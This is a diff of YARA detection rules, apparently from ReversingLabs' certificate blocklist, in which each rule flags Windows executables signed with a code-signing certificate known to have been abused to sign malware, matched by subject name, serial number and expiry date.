-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and pe.signatures [ i ] . serial == "3c:e6:5e:a0:57:b9:75:d2:c1:7e:af:2c:22:97:b1:eb" and 1528243200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" and 1611100800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8fa1f434-2061-5131-9378-58c584eff447"
+		id = "3cde0016-14d8-5b3a-860e-f5128f899542"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14386-L14402"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8452-L8470"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dff7c2d727acca753b030d05028590e1a5577121bb2b4c0dcfcb70b4c9d77cbf"
+		logic_hash = "abd84492ed008125688a53e20d51780fa0b8c2309dcf751ff76a03d6f337beaa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26237,21 +48631,21 @@ rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5d:08:5a:9a:28:85:49:d0:9e:dc:49:41" and 1478757821 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and ( pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" or pe.signatures [ i ] . serial == "86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" ) and 1611273600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5344bda2-bc11-5700-a0f7-52792c5bb87a"
+		id = "226371ea-670f-52f2-8dfc-78b30a29a5cc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14404-L14420"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8472-L8490"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "78c0575a1c9ecf37ef5bac0612c20f96b8641875b0ba786979adc8a77f001a5e"
+		logic_hash = "c118cb46914e7a6df8dd33dd14d5f9cf2692d98311503ec850cc66f02c20839e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26261,21 +48655,21 @@ rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "7d:20:de:c3:79:7a:1a:c3:06:49:eb:b1:84:26:5b:79" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sein\\xC3\\xA4joen Squash ja Bowling Oy" and ( pe.signatures [ i ] . serial == "00:d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" or pe.signatures [ i ] . serial == "d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" ) and 1617667200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0a156a49-c737-5bdb-9178-34121af490d6"
+		id = "41b2e05f-1dcd-5ebc-97da-275512deaf72"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14422-L14438"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8492-L8510"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7383a7fb31a0a913dff1740015ff702642fbb41d8e5a528a8684c80e66026e9d"
+		logic_hash = "ecc2f6bfda1a0afd016f0a5183c0d1cdfe5d5e06c893a7d9a3d7cb7f9bc4bf16"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26285,21 +48679,21 @@ rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "18:7d:92:86:10:76:e4:69:b5:b7:a1:9e:2a:9f:d4:ba" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and ( pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" or pe.signatures [ i ] . serial == "d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" ) and 1611187200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4bb98380-70e5-5ad9-adb2-2e6e10f35258"
+		id = "97f791d5-7a73-5da7-984e-32bb94d0e83f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14440-L14456"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8512-L8528"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "39c6efefcbd78d5e08ffd8d3989cab3bdf273a1847b2a961f9e68c9ee95e85b6"
+		logic_hash = "30d4fa2cbc75d3a6258cdf0374159f25ea152c39784f8b7e9c461978df865dc0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26309,21 +48703,21 @@ rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funcall" and pe.signatures [ i ] . serial == "19:9a:94:76:fe:ca:3c:00:4f:f8:89:d3:45:45:de:07" and 1138060800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" and 1616630400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e402e3b4-a598-504d-85b8-8c1994cb51fc"
+		id = "e2ed910d-2264-58c1-a1a0-3c131020a2cf"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14458-L14474"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8530-L8546"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f849b6899b6766807cfddf99ecb809fe923f35f04de09b62235da352ce6e6e24"
+		logic_hash = "653aff6f3913f1bf51e90e7a835dbb5441457175797cefdddd234a6c2c0f11ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26333,21 +48727,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Plugin Ltd." and pe.signatures [ i ] . serial == "1e:fe:65" and 1063224491 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" and 1602547200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f9c18796-995e-58f8-8406-9adcad143ae7"
+		id = "4a3ffa4a-c080-5d76-9655-010cde091ae2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14476-L14492"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8548-L8564"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "270b5655a0f54abceb520eaca714ed4f6d4de720883e2759acd5bb2f027dfd2b"
+		logic_hash = "7ed62740fe191d961ad32b2a79463cc9cbce557ea757e413860f7b4974904c03"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26357,21 +48751,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0a:f7:e2:b6:a3:de:b9:92:91:dc:af:66" and 1474523112 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" and 1611273600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b4ab6397-5e15-5eb3-9f5d-658c5e3a7e3d"
+		id = "07518dc2-bd6c-5a4c-b537-68f5a462cdc2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14494-L14510"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8566-L8582"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9bcbb84207984b259463482f094bf0f3815f0d74317b6b864dab44769ff5e7e8"
+		logic_hash = "75d2c3b47fe9c863812f2c98fc565af9050b909a03528e2ea4a96542a3ec0c0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26381,21 +48775,21 @@ rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Selig Michael Irfan" and pe.signatures [ i ] . serial == "45:e2:7c:4d:fa:5e:61:75:56:6a:13:b1:b6:dd:f3:f5" and 1465474542 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" and 1610668800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8fc73b48-6797-558a-8265-9aca396e899f"
+		id = "656bb2a6-bb41-5190-af10-280351e64c66"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14512-L14528"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8584-L8600"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "41e126600aae5646b808ed0a4294faa9a63e47842e9cde4fee9e5e65919af7ee"
+		logic_hash = "0cda954aa807336a6737716d0fa43d696376c240ab7be9d8477baf8800604bf1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26405,21 +48799,21 @@ rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAVERIS LIMITED" and pe.signatures [ i ] . serial == "37:d3:6a:4e:61:c0:ac:68:ce:b8:bf:ce:f2:db:f2:83" and 1532476800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" and 1611014400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bf800655-cde4-59fa-9574-1055522fe074"
+		id = "4aa7bea7-06fb-5d90-bac4-c8ca1ca5c02f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14530-L14546"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8602-L8618"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2787375605310877891ef924268f4660d1c8aa020e00674c1b1d7eb3c4f5b2fb"
+		logic_hash = "08950f276e5cf3fe4b5f7421ba671dfd72585aac3bbed7868fdb0e5aa90ec10e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26429,21 +48823,21 @@ rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "We Build Toolbars LLC" and pe.signatures [ i ] . serial == "43:21:de:10:73:82:78:b9:36:83:ca:54:24:07:f1:03" and 1367884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AUTO RESPONSE LTD CYF" and pe.signatures [ i ] . serial == "63:4e:16:e3:8f:12:e9:a7:1a:ca:08:e4:c6:b2:db:b9" and 1616112000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "150773ee-5d85-522d-a693-63bb6a7d1de2"
+		id = "55497d57-7d4f-50e1-85a6-e60786084e3f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14548-L14564"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8620-L8636"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24ae1664c35b7947e2e638bf620d9ab572c70df9cdc1403cc00b422a45ff9194"
+		logic_hash = "cd5d6f95f0cfdbf8d37ea78d061ce00512b6cb7c899152b1640673494d539dd1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26453,21 +48847,21 @@ rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "2a:6b:2d:f2:10:be:14:f4:e1:8e:10:c7" and 1472095404 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" and 1616716800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aabb3a66-5677-5359-9d81-92c8d4c7d910"
+		id = "6a8f3abd-199c-5e2f-a60e-46e869831445"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14566-L14582"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8638-L8656"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a5b85d13dee51d68af28394ecee3dcc2efe7add4d26c2a8033d1855b33ac6271"
+		logic_hash = "5e0de3848adf933632c2eb8cf5ead61d6470237386ba8b48d57a278d99dba324"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26477,21 +48871,21 @@ rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "41:2a:b2:a5:0e:80:28:dd:cb:c4:99:dd:f4:5f:20:45" and 1479340800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) and 1571616000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "de5fbb40-7d41-5f3e-97c9-a6882c19ebb5"
+		id = "d863faac-7b6e-5e1d-960f-8379347c6838"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14584-L14600"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8658-L8674"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9d5e5c98f3ef372532cfc4f544d5d3f620dc2e49d8b6e1c96df29d2a38042019"
+		logic_hash = "696467d699dec060b205f36f53dbe157b241823757d72798b35235d6530fd193"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26501,21 +48895,21 @@ rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "07:47:f6:a8:c3:54:2f:95:4b:11:3f:d9:8c:76:07:cf" and 1474329600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" and 1619049600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b1d71baa-9100-512d-91f4-7286a740e5f2"
+		id = "aa323bac-a9f5-560f-b44a-3cf2b26351bb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14602-L14618"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8676-L8694"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d6b23ba706a640a1e76ad7ab0a70c845c9366ac8355eea5439f76f6993c9c6be"
+		logic_hash = "2112ebfb7c9ebbbccb20cefcd23bb49142da770feb16ee8eef5eb27646226785"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26525,21 +48919,21 @@ rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVA, OOO" and pe.signatures [ i ] . serial == "25:72:b4:84:fa:0a:61:be:72:88:d7:85:d7:bd:a7:d3" and 1495152000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAEN ApS" and ( pe.signatures [ i ] . serial == "00:d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" or pe.signatures [ i ] . serial == "d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" ) and 1619136000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef882d82-f535-57c3-9d45-8d47ecc7f607"
+		id = "c4d3603e-57e2-57df-a055-c43d449242c7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14620-L14636"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8696-L8712"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "11d25dff7e05e6f97725e919cc6c978d7f2e64a91cf04b72461c71d592dfc2dc"
+		logic_hash = "b088ac4b74a8cf3dddb67c8de2b7c3c5f537287a0454c0030c0eb4069c465c7d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
